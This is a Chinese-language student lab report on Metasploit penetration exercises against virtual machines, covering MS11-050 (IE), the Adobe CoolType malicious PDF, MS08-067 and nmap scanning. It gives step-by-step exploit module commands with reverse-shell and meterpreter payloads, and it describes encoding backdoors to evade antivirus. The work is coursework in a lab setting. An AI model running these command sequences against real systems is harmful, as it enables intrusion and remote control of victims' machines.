IE瀏覽器滲透攻擊——MS11050安全漏洞
實驗准備
1.兩台虛擬機,其中一台為kali,一台為Windows Xp Professional(兩台虛擬機可以相互間ping通)。
2.亞軍同學的指導書
實驗步驟
1、在kali終端中開啟msfconsole
。
2、輸入命令use windows/browser/ms11_050_mshtml_cobjectelement
,進入該漏洞模塊。
3、輸入info查看信息:
4、設置對應的載荷set payload windows/meterpreter/reverse_tcp
;
一不小心輸錯指令,看來一邊聽歌一邊輸指令還是容易出錯啊!
5、使用指show options
查看需要設置的相關信息:
6、使用指令set LHOST ‘kali Ip’
,set LPORT XXX
、set URIPATH XXX
設置地址,端口,統一資源標識符路徑。
設置后,使用指令show options
查看
7、使用指令exploit
,以圖可知,靶機需要訪問的ip地址:http://192.168.88.147:8080/blog
8、在靶機IE上輸入網址,並在靶機上查看信息。
如果你用的IE瀏覽器版本是1.7之前的,你會看到這樣的結果
實驗結果的最后是不會創建session 1,所以請用1.7以上版本的IE瀏覽器輸入需要訪問的ip地址。這樣,你才能看到
kali中顯示一個session 1已經創建
9、輸入命令sessions -i 1,
開始連接
Adobe閱讀器滲透攻擊
實驗准備
1.兩台虛擬機,其中一台為kali,一台為Winattacker (兩台虛擬機可以相互間ping通)。
2.亞軍同學的指導書
實驗步驟
1、在kali終端中開啟msfconsole
。
2、輸入命令use exploit/windows/fileformat/adobe_cooltype_sing
,進入該漏洞模塊的使用。
3、使用命令set payload windows/meterpreter/reverse_tcp
設置攻擊有效載荷。
4、輸入命令show options
顯示我們需要在攻擊前需要設置的數據,如下圖紅框圈住的部分。
5、輸入指令set FILENAME xxx.pdf
、 set LHOST "KALI Ip"
、set LPORT xxxx
生成你命名的pdf、設置地址、端口。
設置后,使用指令show options
查看
6、輸入exploit
,生成pdf文件,並可以看到pdf所在文件夾,
將pdf復制到靶機里。再次之前,先安裝一下增強工具吧
7、使用命令back
退出當前模塊,並使用use exploit/multi/handler
新建一個監聽模塊。
8、使用set payload windws/meterpreter/reverse_tcp
建立一個反向連接。
9、使用命令exploit
開始攻擊,在xp中打開pdf。這里pdf比較難打開,直接在kali中等結果就可以啦,如下圖:
輸入指令sysinfo
顯示靶機相關信息
MS08_067漏洞滲透攻擊實踐
實驗准備
1.兩台虛擬機,其中一台為kali,一台為WinXPenSP3 (兩台虛擬機可以相互間ping通)。
2.亞軍同學的指導書
MS08_067遠程漏洞攻擊實踐:Shell
1、在kali終端中開啟msfconsole
。
2、輸入命令search ms08_067
,會顯示出找到的滲透模塊,如下圖所示:
3、輸入命令use exploit/windows/smb/ms08_067_netapi
,進入該漏洞模塊的使用。
4、輸入命令show payload
會顯示出有效的攻擊載荷,如下圖所示,我們找到一個shell_reverse_tcp。
5、命令show targets
會顯示出可以被攻擊的靶機的操作系統型號,如下圖所示:
6、使用命令set payload generic/shell_reverse_tcp
設置攻擊有效載荷。
7、輸入命令show options
顯示我們需要在攻擊前需要設置的數據,如下圖紅框圈住的部分。
8、輸入指令set LHOST "kali Ip"
、 set RHOST "Win xp Ip"
,設置后使用命令show options
再次查看payload狀態。
9、輸入命令exploit
開始攻擊,如下圖所示是正常攻擊成功結果。
在kali上執行ipconfig/all
得到如下圖所示:
在win xp上執行同樣的命令,如下圖所示:
MS08_067遠程漏洞攻擊實踐:meterpreter
1、前面依然使用命令use exploit/windows/smb/ms08_067_netapi
,進入ms08_067漏洞模塊。
2、設置payload:set payload windows/meterpreter/reverse_tcp
3、show options
,查看需要設置的ip地址,如下圖所示,是已經設置好的
4、成功攻擊結果:
5、執行ifconfig
,查看靶機地址:
在靶機上執行ifconfig
應用輔助模塊
實驗准備
1.兩台虛擬機,其中一台為kali,一台為Win8 (虛擬機與主機可以相互間ping通)。
2.亞軍同學的指導書
實驗步驟
1、先手動創建一個msf所需的數據庫,使用指令service postgresql start
、msfdb start
2、開啟msf,使用指令msfconsole
3、開啟nmap掃描,可以看見開啟的端口號,以及目標機的操作系統
用自己的話解釋什么是exploit,payload,encode.
exploit
,Metaploit目錄中所有可用的漏洞利用代碼。
payload
,Metaploit目錄中攻擊載荷,是系統被攻陷后執行的操作。通常攻擊載荷附加於漏洞攻擊模塊之上,隨漏洞攻擊一起分發。
encode
,對后門程序進行編碼處理,使其免殺。
實驗總結與體會
首先,我要坦白,因為本次四個實驗我完全按着科技負責人張亞軍的實驗博客照本宣科,沒有創新。我也曾不願活在張亞軍同學的“影子”下,一個叫羞恥心的小人在我心里瘋狂吶喊着“我想當勇士!我要利用一個和別人都不一樣漏洞做實驗!”於是我百度到一個 叫Ms07-029
遠程溢出漏洞,根據相關資料,我明白了在exploit之前,我需要下一個叫dns.exe的小工具。不得不說,現在在網上下載這些小工具,真的是大浪淘沙,看到各種綠色無毒,快速下載的幌子,我頭都大了。生怕下載工具后,在桌面右下角彈出美女照片,我從來沒有這么抗拒美女照片過。好吧,工夫不負有心人
喏,就是它了。首先要打開它,我在Kali里打開它,提示我無法打開二進制文件,於是我決定在主機WIN下打開,在我輸入./dns.exe
指令后,終端提醒我.不是內部指令,后來我百度了才知道,在WIN終端下打開文件的命令是staet,好怕婁老師跳出來打我呀。好吧,在我輸入指令start dns.exe
后,有個轉瞬即逝的窗口,納尼?這就沒了,這和我看得實驗指導書不一樣啊,按理說劇本應該是這樣
然而現實給我一個下勾拳
在尋求班級大觸高其的幫助后依然無果后,一陣疲憊感不由自主地泛上心頭,原來勇士不是那么好做的。心里的大壩最終還是決堤了,飛流直下,小人兒失落地站在瀑布底,沉默地淋着。至此,我知道我的雄心壯志不過三分鍾熱度,狼狽不堪地收拾散落一地的道具,刪除dns.exe,關掉網上的指導書,結束鬧劇。